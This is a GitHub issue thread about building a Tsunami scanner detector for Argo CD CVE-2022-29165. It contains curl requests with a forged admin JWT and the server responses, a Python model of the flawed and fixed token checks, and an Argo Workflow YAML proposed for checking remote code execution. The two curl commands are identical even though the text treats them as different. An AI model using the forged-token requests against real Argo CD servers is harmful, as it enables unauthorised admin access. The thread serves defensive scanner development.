maoning opened this issue 3 months ago
I just saw your tweet, working on this issue is exciting for me :))
Hi @JamesFoxxx,
Thank you for picking up this request! Please make sure the following items are completed before the plugin implementation:
Hi, I read the source code of argo-cd and the fix commit of the CVE here and I'm happy that I managed to exploit this CVE.
I tried to find endpoints that an anonymous user can't access, and endpoints that don't need further setup on argo-cd, like installing additional applications.
An anonymous user can't get the list of certificates; the request in this case is:
```shell
curl -i -s -k -X $'GET' -H $'Host: argocdHOST' -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ' $'https://127.0.0.1:8081/api/v1/certificates'
```
and the response is:
```http
HTTP/1.1 403 Forbidden
Content-Type: application/json
Date: Mon, 25 Mar 2024 03:24:05 GMT
Content-Length: 110
Connection: close

{"error":"permission denied: certificates, get, ","code":7,"message":"permission denied: certificates, get, "}
```
however, with the help of the CVE, we can send a request like the following:
```shell
curl -i -s -k -X $'GET' -H $'Host: argocdHOST' -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ' $'https://127.0.0.1:8081/api/v1/certificates'
```
Note that the `argocd.token` is a forged token.
I can confirm that the response is the same as an authenticated admin:
```http
HTTP/1.1 200 OK
Content-Type: application/json
Grpc-Metadata-Content-Type: application/grpc
Date: Mon, 25 Mar 2024 03:34:04 GMT
Content-Length: 1421

{"metadata":{},"items":[{"serverName":"bitbucket.org","certType":"ssh","certSubType":"ssh-rsa","certData":null,"certInfo":"SHA256:zzXQOXSRBEiUtuE8AikJYKwbHaxvSc0ojez9YXaGp1A"},
...
```
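The check that the forged token above slips past, modelled as an added example (this is not code from the thread or from Argo CD): the vulnerable subject lookup beside its hardened form. The HMAC secret and the correctly signed token minted under it are constructed for the example; only the forged token comes from the post.

```python
import base64
import hashlib
import hmac
import json

# Constructed signing secret for this example; the real Argo CD key is not on this page.
SECRET = b"constructed-example-secret"
# The forged token quoted in the thread: header {"alg":"HS256","typ":"JWT"},
# payload {"sub":"admin"}, and a signature the server's key never produced.
FORGED_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9."
                "TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ")

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def sign_hs256(payload: dict, key: bytes) -> str:
    """Mint a correctly signed HS256 token, standing in for the server's own issuer."""
    parts = [b64url_encode(json.dumps(p, separators=(",", ":")).encode())
             for p in ({"alg": "HS256", "typ": "JWT"}, payload)]
    sig = hmac.new(key, ".".join(parts).encode(), hashlib.sha256).digest()
    return ".".join(parts + [b64url_encode(sig)])

def verify_hs256(token: str, key: bytes):
    """Return (claims, error); note the claims come back even when the signature is bad."""
    try:
        header, body, sig = token.split(".")
        if json.loads(b64url_decode(header)).get("alg") != "HS256":
            return None, "unexpected alg"
        claims = json.loads(b64url_decode(body))
        expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig)):
            return claims, "signature mismatch"
        return claims, None
    except (ValueError, AttributeError) as exc:
        return None, f"malformed token: {exc}"

def vulnerable_subject(token: str, key: bytes, anonymous_enabled: bool):
    """Bug pattern: when anonymous access is on, the verify error is dropped and unverified claims win."""
    claims, err = verify_hs256(token, key)
    if err and not anonymous_enabled:
        return None
    return claims.get("sub") if claims else None

def fixed_subject(token: str, key: bytes, anonymous_enabled: bool):
    """Hardened form: a verification failure never yields a subject, whatever the anonymous setting."""
    claims, err = verify_hs256(token, key)
    return None if err else claims.get("sub")
```

With anonymous access enabled, `vulnerable_subject` treats the forged token as `admin` while `fixed_subject` rejects it; a token signed with the server's own key is accepted by both.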
@JamesFoxxx Thanks for submitting the testing configs to security-testbeds, they are really helpful for me to understand how Argo CD works as well.
What you proposed could work, but I think we can make this plugin more effective by detecting all exposed Argo services including but not limited to CVE-2022-29165 for max bounty.
Could you check if it is possible to submit a workflow like this to all versions of exposed Argo services:
```yaml
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  name: ''
  generateName: scripts-
spec:
  destination:
    name: ''
    namespace: ''
    server: ''
  source:
    path: ''
    repoURL: ''
    targetRevision: HEAD
  project: ''
  entrypoint: tsunami-rce
  templates:
    - name: tsunami-rce
      steps:
        - - name: generate
            template: gen-printf-bash
        - - name: print
            template: print-message
            arguments:
              parameters:
                - name: message
                  value: '{{steps.generate.outputs.result}}'
    - name: gen-printf-bash
      script:
        image: 'debian:9.4'
        command:
          - bash
        source: |
          printf %s%s%s TSUNAMI_PAYLOAD_START randomstring TSUNAMI_PAYLOAD_END // Generate from Tsunami payload generator
```
The plugin will cover the following scenarios:
References:
@maoning The links and the payload that you are referring to are for Argo Workflows, not Argo CD. I can, however, write a separate plugin for Argo Workflows, which is as popular as Argo CD. Argo CD and Argo Workflows differences: https://github.com/argoproj/argo-workflows/discussions/7435#discussioncomment-1837543 https://github.com/argoproj/argo-workflows/discussions/7435#discussioncomment-2177941
The good news is that I found out how to enable anonymous admin access for argo-cd.
Great, thanks for spotting the difference!
For Argo Workflows, we have an existing plugin: https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/exposedui/argoworkflow/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argoworkflow/ExposedArgoworkflowDetector.java
If you see significant value for a separate Argo Workflow plugin, please post it in a separate plugin request, I will review it.
For the current request, if there's no easy way to trigger RCE, then let's move forward with your proposal + anonymous admin access case.
Please submit our participation form and you can start working on the development.
Reference: https://github.com/advisories/GHSA-r642-gv9p-2wjj
Please read the rules of engagement first at https://github.com/google/tsunami-security-scanner-plugins/issues/409.